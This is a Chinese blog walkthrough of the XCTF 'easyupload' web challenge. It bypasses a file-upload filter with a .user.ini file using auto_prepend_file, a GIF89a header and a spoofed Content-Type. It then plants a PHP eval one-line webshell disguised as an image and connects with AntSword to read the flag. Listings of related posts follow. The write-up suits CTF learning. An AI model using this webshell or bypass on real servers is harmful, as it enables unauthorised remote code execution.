攻防世界--WEB--easyupload

最新推荐文章于 2024-06-25 07:08:57 发布
最新推荐文章于 2024-06-25 07:08:57 发布
阅读量324 收藏 1
点赞数
文章标签: 前端 css html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65766842/article/details/129865337
版权

首先我们打开题目

 这是一道文件上传题目,我们尝试上传一句话木马

 被发现了,我们尝试打开源代码看看是否有有用的信息

 我们访问chatgpt来解释代码

 没有发现什么有用的信息,我们在回看题目,

我们从这里知道要求上传的可能是一张图片。

但是更改了文件头之后上传后,用蚁剑链接之后并没有什么可用的信息,思路到此开始断了,我们查询做题方法,发现这题是要用到.user.ini的绕过我们去寻找.user.ini染过的方法。

做题方法参考:

https://blog.csdn.net/weixin_44830645/article/details/128495561?ops_request_misc=&request_id=&biz_id=102&utm_term=%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Ceasyupload&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-5-128495561.142^v78^insert_down1,201^v4^add_ask,239^v2^insert_chatgpt&spm=1018.2226.3001.4187

.user.ini文件的参考资料:

https://blog.csdn.net/weixin_52635170/article/details/126962920?ops_request_misc=&request_id=&biz_id=102&utm_term=.user.ini%E6%96%87%E4%BB%B6&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-126962920.142^v79^insert_down38,201^v4^add_ask,239^v2^insert_chatgpt&spm=1018.2226.3001.4187

我们首先构造出.user.ini文件,因为我们刚刚发现是要上传一张图片的类型,所以我们加上文件头

GIF89a                  
auto_prepend_file=a.jpg

因为我们这个不是真的jpg文件,所以我们使用bp抓包来着更改识别项

我们更改Content-Type: image/jpeg

然后将更改的包放回去,提示我们上传成功了

 此时我们再次上传一句话木马,我们依旧加上文件头,伪装成图片。

GIF89A
<?php @eval($_POST['attack']);?>

我们上传成功之后使用蚁剑进行后台文件连接

先传user.ini再传a.jpg

根据文件的返回路径:uploads/a.jpg

蚁剑连接:

 连接成功之后,我们在根目录下发现了flag文件,打开得到flag

 

 

m0_65766842
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 easyupload 解题详析
等风来
07-31 7925
抓包改后缀,.php1~.php9、.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令):提示:只要是运用了fastcgi的服务器都能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
CTF-WEB攻防世界题目实战解析easyupload
2301_76565920的博客
04-23 1511
题目:easyupload 难度:1知识点:上传漏洞,服务器防护绕过,后门,.user.ini,auto_prepend_file的使用
攻防世界】CTF 网络安全学习 easyupload_攻防世界easyupload
最新发布
2401_84263282的博客
06-25 453
做这个题目前前后后一共花了五天的时间,因为本身不是一直有空,这道题首先要预先处理的问题很多。1. 先安装好中国蚁剑,教程整理如下,kali 零基础安装中国蚁剑2. 理解 **.user.ini**文件.user.ini 文件通常是与 PHP 配置相关的文件。在 PHP 应用程序中,用户可以通过 .user.ini 文件来自定义一些 PHP 的配置选项,以适应特定的应用需求。以下是一些关键点:位置: .user.ini 文件通常位于用户的网站目录下,可以影响到该目录及其子目录下的 PHP 执行环境。
easyupload(攻防世界)
m0_56107268的博客
11-15 8298
.user.ini 学习
攻防世界-web-easyupload
wuh2333的博客
04-09 646
攻防世界,文件上传
攻防世界 easyupload
rev1ve的博客
03-09 642
ctf攻防世界 easyupload web
攻防世界easyupload
m0_73303597的博客
11-10 445
自用
攻防世界easyupload
小缪的博客
06-10 3398
知识点:文件上传漏洞。
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1169
好难啊
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4567
尝试
攻防世界-misc-arrdeepee
苏生要努力
03-11 1257
题目:我们某一个box被pwn了。在检查过程中,我们发现了一个叫mimikatz的东西,我们以前没有安装过,所以我们清除了,并且重新安装了box。但是安装太麻烦了,除了需要解决openssl 1.0.2和1.1.0+的兼容性问题,还涉及到cmake安装时ffmpeg等各种库的版本问题,回头下载一个2016.2版本的Kali试试看能否正常安装。然后过滤tls协议,可以看到解密后的流量中出现了RDP和TPKT协议。需要输入密码,题目里给出了一个目前没有用到的信息mimikatz,尝试作为密码,成功提取出密钥。
攻防世界--easyupload
qq_73611185的博客
09-16 834
php文件发现网页设置了文件类型检测,修改文件后缀为jpg依然无效,第二步,尝试去burpsuite改包,将一句话木马文件上传后的cotent-type改为image/jpg,然后放包,仍然无法上传成功(burpsuite改包之后把拦截请求关了就是放包)然后同理第二步,上传成功之后再上传一个jpg文件(命名与上面的jpg文件保持一致否则会导致连接失败),文件内容为:(没有结尾那个v,懒得删除了)还有一个不能上传文件成功的原因很离谱就是:不能使用校园网进行上传(学生党的痛)成为ctf全栈之路之web第十题。
[攻防世界] easyupload
m0_75178803的博客
04-02 634
首先准备 .user.ini 文件和a.jpg文件。首先上传.user.ini文件,然后进行抓包。1.[攻防世界] easyupload。用蚁剑连接该页面,连接密码为木马密码。.user.ini 文件上传成功。此时再将a.jpg文件上传成功。在根目录下得到flag。
攻防世界-easyupload
m0_62094846的博客
10-10 2862
上传php文件不行, 修改Content-Type: image/jpeg也不行,把文件名改成jpg才可以,还有头文件也有验证,也要改(这里直接上传正常的jpg文件比较好)然后可以上传成功,但是试过文件名的各种绕过形式,都不能把php上传,就算上传了也不能在蚁剑上读取。这个系统是windows,用user.ini试试(user.ini:把文件当作php文件解析)(index.php是uploads下的php文件,用它读取5.jpg下的文件)然后输入木马,这里尝试过后php也是被过滤的,用缩减版。
攻防世界Web easyupload
DG_s1mple
12-30 946
本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行关于.user.ini文件是怎么利用的,可以非常详细,我这里截取一段.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR、PHP_INI_USER”的设置。而且,和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,
easyupload-CTF-攻防世界
szhangliwenya的博客
03-20 654
user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。如果你的连接路径是http://x.x.x.x:端口/uploads/shell.jpg这样的话,是不对的。正确的连接url地址应为http://x.x.x.x:端口/uploads/index.php (请回想.user.ini文件及auto_prepend_file方法)左上角文件另存为.user.ini文件 后上传。
攻防世界web_easyupload
Blue的博客
02-22 471
攻防世界web_easyupload
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值